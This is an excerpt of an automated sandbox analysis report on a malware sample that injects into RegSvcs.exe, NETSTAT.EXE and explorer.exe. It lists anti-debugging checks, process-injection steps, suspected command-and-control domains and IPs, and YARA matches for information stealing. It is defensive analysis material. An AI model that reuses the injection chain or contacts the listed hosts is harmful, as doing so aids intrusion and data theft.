      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01308794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013337F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01328E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013746A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013216E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013076E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01338EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013236CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03668B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036153CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036153CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035BDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03665BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035C2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035CB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035A1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035A1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0364D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0365138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035C4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035C4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035C4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0364B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0364B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03668A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03599240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03599240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03599240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03599240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035D927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0365EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03624257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035B3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03595210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03595210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03595210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03595210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0359AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0359AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035A8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035D4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035D4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0365AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0365AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035C2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035C2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035CD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035CD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035AAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035AAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035CFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035BB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035BB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0359B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0359B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0359C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03599100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03599100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03599100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035C513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035C513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035B4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_036241E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0359B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01339910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | Network Connect: 38.55.236.89 80
Source: C:\Windows\explorer.exe | Domain query: www.darkchocolatebliss.com
Source: C:\Windows\explorer.exe | Domain query: www.marketmall.digital
Source: C:\Windows\explorer.exe | Network Connect: 172.67.148.132 80
Source: C:\Windows\explorer.exe | Network Connect: 54.38.220.85 80
Source: C:\Windows\explorer.exe | Network Connect: 154.209.6.241 80
Source: C:\Windows\explorer.exe | Network Connect: 89.31.143.1 80
Source: C:\Windows\explorer.exe | Domain query: www.canadianlocalbusiness.com
Source: C:\Windows\explorer.exe | Domain query: www.y31jaihdb6zm87.buzz
Source: C:\Windows\explorer.exe | Network Connect: 162.213.255.142 80
Source: C:\Windows\explorer.exe | Domain query: www.ope-cctv.com
Source: C:\Windows\explorer.exe | Domain query: www.dersameh.com
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 1010000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AB0008
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread register set: target process: 3452
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Thread register set: target process: 3452
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.241334039.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: XProgram Manager
Source: explorer.exe, 00000002.00000000.304298844.000000000835D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253031171.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager (Not Responding)
Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.241334039.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Queries volume information: C:\Users\user\Desktop\NHYGUnNN.exe VolumeInformation
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information

Source: Yara match | File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
